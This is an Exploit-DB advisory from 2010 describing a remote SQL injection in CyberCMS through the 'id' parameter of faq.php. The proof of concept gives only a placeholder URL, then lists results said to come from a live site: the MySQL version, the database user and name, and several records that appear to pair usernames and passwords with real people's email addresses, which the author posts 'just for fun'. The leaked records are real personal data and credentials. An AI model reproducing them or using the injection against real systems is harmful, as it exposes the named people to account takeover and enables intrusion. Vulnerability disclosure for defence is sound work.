CyberCMS - Remote SQL Injection

2010-03-26T00:00:00
ID EDB-ID:11895
Type exploitdb
Reporter hc0de
Modified 2010-03-26T00:00:00

Description

CyberCMS Remote SQL Injection Vuln.. Webapps exploit for php platform

                                        
                                            # Exploit Title: CyberCMS Remote SQL Injection Vuln.
# Date: 26/11/2009
# Author: hc0de | hc0de.blogspot.com<http://hc0de.blogspot.com>
# Software Link: http://cyberfusion.ramx.org/cyber-cms
# Version: [app version]
# Tested on: Ubuntu Linux 9.04
# CVE :
# PoC:

+Target: http://server/faq.php?id=SQL_CODE

-MySQL Version: 5.0.37-community-nt
-MySQL User: skoleung@localhost
-MySQL Database: uskole

+Datas:
3:memborg:memborg:1:memborg@cyberfusion.dk<mailto:3%3Amemborg%3Amemborg%3A1%3Amemborg@cyberfusion.dk>
6:Leder:huskerikke:1:john.landbo@morsoe.dk<mailto:6%3ALeder%3Ahuskerikke%3A1%3Ajohn.landbo@morsoe.dk>
...etc.. :) just for fun :P